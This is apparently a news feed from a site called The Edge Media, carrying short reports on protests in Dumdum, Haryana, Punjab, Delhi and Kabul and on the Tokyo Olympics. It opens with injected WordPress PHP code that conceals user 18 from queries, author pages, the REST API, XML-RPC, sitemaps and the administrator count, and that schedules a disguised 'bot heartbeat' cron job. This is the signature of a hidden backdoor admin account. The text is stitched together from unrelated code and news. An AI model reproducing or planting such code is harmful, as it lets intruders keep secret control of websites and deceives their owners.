add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Rally in Dumdum Demands Severe Punishment for Accused in Assault of Minor Girl appeared first on The Edge Media.
]]>Details of the Case
The accused, identified as Rajesh Paswan, Vicky Paswan, and Sanju Sai, are currently in police custody. They have been charged under the POCSO Act for allegedly abducting and assaulting a class 8 student. Reports indicate that the girl was taken to a secluded location while returning from her tuition classes and later left near her home during the last week of October.
Public Outcry and Protest March
Hundreds of people, including many women, participated in the rally that stretched over two kilometers—from Airport Gate No 1 to Nagerbazar via Kalidhan Colony and Gorabazar. The participants demanded the death penalty for the accused, expressing outrage over the incident.
Statement from Bangla Pokkho
Garga Chatterjee, the general secretary of Bangla Pokkho, stated that political parties have remained silent due to vote-bank concerns. He added that the organization would continue its protests until the culprits face severe punishment and Bengali daughters can live without fear.
The post Rally in Dumdum Demands Severe Punishment for Accused in Assault of Minor Girl appeared first on The Edge Media.
]]>The post Farmers claim they were hit by a BJP MP’s convoy during a protest in Haryana, and one person was injured appeared first on The Edge Media.
]]>
The farmer who was injured was taken to a government hospital in Naraingarh, near Ambala, where the accident occurred. After being treated, he was freed and informed reporters that he was standing by the side of the road when he was knocked over by the vehicle that followed the MP.
Farmers have demanded that an FIR be made against the driver of the car, and have threatened to gherao, or surround, the police station on October 10 if this is not done.
The post Farmers claim they were hit by a BJP MP’s convoy during a protest in Haryana, and one person was injured appeared first on The Edge Media.
]]>The post Farmers in Haryana have called off their protest after the government promised an investigation into the Karnal incident and SDM Ayush Sinha’s conduct appeared first on The Edge Media.
]]>The state administration has informed farmer union leaders that an inquiry committee, chaired by a senior judge, will be formed to investigate the August 28 Karnal tragedy and the role of IAS official Ayush Sinha. Sinha will be on leave until the investigation is completed.
Farmers have also been guaranteed that two family members of farmer Sushil Kajal (who died after a police lathi charge at the Bastara toll plaza on August 28) will be provided jobs.
The post Farmers in Haryana have called off their protest after the government promised an investigation into the Karnal incident and SDM Ayush Sinha’s conduct appeared first on The Edge Media.
]]>The post Taliban fired shots into air to disperse crowds at the protest appeared first on The Edge Media.
]]>The Taliban fired shots into the air to disperse crowds at the protest, news agency AFP reported.
Pakistan’s spy agency Inter-Services Intelligence (ISI), which is notorious for supporting terror groups against India, is believed to be working with the Taliban and laying the groundwork for a new government in the country where a US-led alliance fought a war against terror for 20 years.
“ISI stay away,” read a placard held up by a woman at the protest outside the Pakistani embassy in the Afghan capital.
“The Islamic government is shooting at our poor people,” one panic-stricken woman on the street says over sounds of gunfire in a video clip posted on Twitter by Asvaka news agency. “These people (Taliban) are very unjust, and they are not human at all.”
The post Taliban fired shots into air to disperse crowds at the protest appeared first on The Edge Media.
]]>The post BJP MP Varun Gandhi describes farmers as “our own flesh and blood” appeared first on The Edge Media.
]]>A large number of farmers are attending a mahapanchayat organised by the Samyukt Kisan Morcha (SKM) at the Government Inter College ground in Muzaffarnagar in Uttar Pradesh
“Lakhs of farmers have gathered in protest today in Muzaffarnagar. They are our own flesh and blood. We need to start re-engaging with them in a respectful manner: understand their pain, their point of view and work with them in reaching common ground,” Mr Gandhi tweeted, posting a short video of the large crowd.
See the tweet here :
The mahapanchyat comes ahead of the crucial Uttar Pradesh assembly polls next year.
The Centre had held talks with the protesting farmer unions but in vain as it did not agree to their demand of withdrawing the three farm laws.
The government has insisted that these Acts have given farmers new opportunity to sell their produce and rejected the criticism that they are aimed at doing away with the minimum support price regime and farm mandis.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post BJP MP Varun Gandhi describes farmers as “our own flesh and blood” appeared first on The Edge Media.
]]>The post Punjab Farmers End Protest After Chief Minister Hikes Cane Prices appeared first on The Edge Media.
]]>Under the farmers’ agitation, which entered its fifth day on Tuesday, the protesters had blocked a national highway and Ludhiana-Amritsar and Ludhiana-Jammu rail tracks in Jalandhar.
“Happy to share that after consultation with farmers, have approved SAP (state advised price) for sugarcane at ₹ 360 per quintal. My government is committed to the welfare of our farmers. Jai Kisan, Jai Jawan!” Mr Singh said in a tweetAfter a meeting with the chief minister, farmer leader Manjit Singh Rai told reporters that their pending arrears will be paid in 15 days.
The post Punjab Farmers End Protest After Chief Minister Hikes Cane Prices appeared first on The Edge Media.
]]>The post “Protect Afghan Women”: Hundreds Join In Protest In Delhi appeared first on The Edge Media.
]]>Students, mostly women, raised slogans and carried posters demanding support for the Afghan women and children as Afghanistan’s capital city Kabul fell to the militia last Sunday.
With placards of “Protect Afghan Women”, they sought to raise their voices for the women who are on the brink of losing their hard-earned rightsEven as the Taliban, at a press conference last week, reassured the world that they have changed, their message of moderation was contradicted by the protesters whose families remain stuck in Afghanistan.
The post “Protect Afghan Women”: Hundreds Join In Protest In Delhi appeared first on The Edge Media.
]]>The post Tokyo Olympics on Time, In spite of the Japanese opposition: IOC Chief appeared first on The Edge Media.
]]>He said,”With Tokyo Olympics finally on the horizon, the final countdown has begun. During this difficult times, we need to send a strong message of resilience, unity and our diversity”.
Despite of the fact that most Japanese are protesting against the Olympics, the IOC remained unwaivered. People are protesting for the cancellation due to the surge in Corona cases.
Regarding this, Bach said,”The safety and security of everyone is utmost priority. But together with our Japanese colleagues we will have to ensure that our athletes can come together and compete in a safe environment. Over 70 per cent athletes and officials have already been vaccinated and this number will grow with time. We have also received offers from three vaccine producers for vaccination”.
The post Tokyo Olympics on Time, In spite of the Japanese opposition: IOC Chief appeared first on The Edge Media.
]]>